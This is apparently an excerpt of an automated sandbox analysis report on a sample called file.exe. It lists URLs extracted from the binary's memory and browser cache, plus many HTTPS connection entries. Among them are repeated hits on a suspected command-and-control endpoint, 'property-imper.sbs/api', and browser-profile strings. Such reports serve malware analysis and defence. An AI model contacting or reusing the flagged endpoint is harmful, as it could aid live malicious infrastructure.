          Source: file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
          Source: chromecache_120.5.drString found in binary or memory: http://schema.org/Organization
          Source: file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: file.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://aka.ms/certhelp
          Source: chromecache_120.5.dr, chromecache_121.5.drString found in binary or memory: https://aka.ms/feedback/report?space=61
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://aka.ms/msignite_docs_banner
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://aka.ms/pshelpmechoose
          Source: chromecache_120.5.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
          Source: chromecache_120.5.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
          Source: chromecache_120.5.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
          Source: file.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: file.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: file.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://channel9.msdn.com/
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
          Source: file.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: file.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: file.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: chromecache_120.5.drString found in binary or memory: https://github.com/Thraka
          Source: chromecache_120.5.drString found in binary or memory: https://github.com/Youssef1313
          Source: chromecache_120.5.drString found in binary or memory: https://github.com/adegeo
          Source: chromecache_120.5.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
          Source: chromecache_120.5.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
          Source: chromecache_120.5.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
          Source: chromecache_120.5.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://github.com/dotnet/try
          Source: chromecache_120.5.drString found in binary or memory: https://github.com/gewarren
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://github.com/js-cookie/js-cookie
          Source: chromecache_120.5.drString found in binary or memory: https://github.com/mairaw
          Source: chromecache_120.5.drString found in binary or memory: https://github.com/nschonni
          Source: chromecache_120.5.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
          Source: file.exe, file.exe, 00000000.00000003.2100399838.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173430038.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2365723765.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2355867741.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356772744.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361368743.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
          Source: file.exe, 00000000.00000003.2147954012.00000000007E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/$$
          Source: file.exe, 00000000.00000003.2256689314.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/%
          Source: file.exe, 00000000.00000003.2125868783.00000000007E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/%%
          Source: file.exe, 00000000.00000003.2256766468.000000000542A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/.
          Source: file.exe, 00000000.00000003.2173699669.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177722586.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177605541.00000000007E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/CC
          Source: file.exe, 00000000.00000003.2256689314.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/M
          Source: file.exe, 00000000.00000003.2256689314.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/U
          Source: file.exe, 00000000.00000003.2361368743.0000000000782000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147221434.000000000543A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
          Source: file.exe, 00000000.00000003.2147063638.000000000543A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147221434.000000000543A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiH
          Source: file.exe, 00000000.00000003.2173430038.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173699669.00000000007E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apihQ
          Source: file.exe, 00000000.00000003.2256689314.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/e
          Source: chromecache_101.5.drString found in binary or memory: https://schema.org
          Source: file.exe, 00000000.00000003.2149998886.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: file.exe, 00000000.00000003.2149998886.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
          Source: chromecache_101.5.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
          Source: file.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: file.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: chromecache_112.5.dr, chromecache_101.5.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
          Source: file.exe, 00000000.00000003.2149998886.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
          Source: file.exe, 00000000.00000003.2149998886.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
          Source: file.exe, 00000000.00000003.2149998886.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: file.exe, 00000000.00000003.2149998886.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: file.exe, 00000000.00000003.2149998886.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
          Source: file.exe, 00000000.00000003.2149998886.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
          Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
          Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
          Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
          Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
          Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
          Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
          Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
          Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
